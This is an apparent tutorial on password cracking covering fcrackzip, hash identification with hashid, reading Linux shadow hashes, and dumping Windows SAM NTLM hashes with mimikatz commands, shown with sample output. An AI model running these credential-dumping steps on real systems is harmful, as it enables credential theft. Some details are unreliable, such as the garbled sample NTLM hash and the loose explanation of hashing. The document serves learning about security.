Password Cracking

Cracking Zipped Files

fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask’ed images.

Password Hashes

Hashes are one way mathematical functions that create a standard sized, depending on the algorith, unique output for any length of strings. These functions are incredibly useful for concealing the real passwords and having only the hashes pass through the communication medium. So instead of a user submitting the password through an encrypted channel to an application, the password is converted into a hash at the browser and then submitted to the application, which in turn compares with the hash in the database against the user. Hence at no point, except at the JS level, the password of the user is revealed.

Unfortunately there are different attacks to this scenaio - read the password at the JS level, use the hash instead of the password or crack the hash through trial & error method. We are going to exploit the last method here.

In order to crack a hash, we need to first identify the type of hash, since there are many algorithms & combination of methods that generate different hashes, and then compute hashes from a list of pre-defined password strings.

Where can I find the hashes?

Linux

The password has is either stored within the passwd or shadow file in the "etc" folder. A simple cat of the file can reveal the hash unless the files are read protected. Here's a sample,

cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD.:19278:0:99999:7:::

The hash section can be taken out of this line and fed into the hashid command to identify the type of hash algorithm used,

hashid '$6$T6lcJJcLaIi3KQ8k$SzDYMo2863hQQUz8o33O6.FzIx9QvjHz9Qrk/68PYKwNS3vHdcmWNeRhyegCv96QNYG5aAqUnK/zeP9cm2eqS/'

Windows

Its slightly more tricky in the Windows operating system with the hashes being stored locally and in an Active Directory, if ADs are used. We will use a tool called "mimikatz.exe" to retreive password hashes. This tool is not available by default and it has to be downloaded into the system.

This tool has to be launched from a command prompt with administrative rights.

mimikatz.exe
//once the tool executes, the following commands have to be used
privilege::debug
token::elevate
lsadump::sam

The last command should dump all the users along with their hashes as shown below,

User : victim
  Hash NTLM: 2892z26cdf84d9a70e2eb3y9f05c425e